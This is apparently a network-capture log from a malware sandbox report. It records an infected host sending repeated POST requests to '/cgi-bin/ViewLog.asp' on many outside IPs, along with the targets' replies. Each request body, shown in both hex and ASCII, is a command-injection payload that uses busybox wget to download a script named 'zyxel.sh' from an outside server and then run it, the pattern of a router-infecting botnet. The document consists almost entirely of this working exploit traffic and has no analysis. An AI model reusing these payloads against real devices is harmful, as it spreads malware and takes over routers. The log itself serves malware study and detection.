                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      169192.168.2.155948885.9.99.1388080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:16.082761049 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:16.370795012 CET113INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 08:29:16 GMT
                                                      Content-Length: 0
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      170192.168.2.155609285.31.233.598080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:16.449037075 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      171192.168.2.154611094.130.127.1378080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:16.513189077 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:16.720432043 CET1286INHTTP/1.0 400 Bad Request
                                                      Server: squid/3.1.23
                                                      Mime-Version: 1.0
                                                      Date: Mon, 12 Feb 2024 23:31:15 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 3201
                                                      X-Squid-Error: ERR_INVALID_URL 0
                                                      Vary: Accept-Language
                                                      Content-Language: en
                                                      X-Cache: MISS from localhost.localdomain
                                                      X-Cache-Lookup: NONE from localhost.localdomain:500
                                                      Via: 1.0 localhost.localdomain (squid/3.1.23)
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* speci


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      172192.168.2.155017462.65.35.1228080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:16.551403999 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:17.306507111 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:18.778434038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:21.946528912 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:27.834163904 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:39.609901905 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:04.441135883 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:51.543762922 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      173192.168.2.153334485.95.156.2018080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:16.776981115 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:17.105657101 CET274INHTTP/1.0 200 OK
                                                      Server: httpd/2.0
                                                      x-frame-options: SAMEORIGIN
                                                      x-xss-protection: 1; mode=block
                                                      Date: Wed, 14 Feb 2024 08:31:02 GMT
                                                      Content-Type: text/html
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp';</script></HEAD></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      174192.168.2.153335285.95.156.2018080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:17.447114944 CET334INHTTP/1.0 400 Bad Request
                                                      Server: httpd/2.0
                                                      x-frame-options: SAMEORIGIN
                                                      x-xss-protection: 1; mode=block
                                                      Date: Wed, 14 Feb 2024 08:31:02 GMT
                                                      Content-Type: text/html
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      175192.168.2.155202431.33.136.298080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:18.345046997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:18.938417912 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:20.122467041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      176192.168.2.155175462.103.31.1798080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:18.396085024 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:18.684637070 CET36INHTTP/1.1 403 Forbidden


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      177192.168.2.154403894.122.16.2008080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:18.400614977 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      178192.168.2.155146062.171.171.1148080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:18.555161953 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      179192.168.2.154973685.208.21.1178080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:18.615242958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      180192.168.2.154570431.136.192.998080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:18.617885113 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:19.290477991 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:20.634419918 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:23.482359886 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
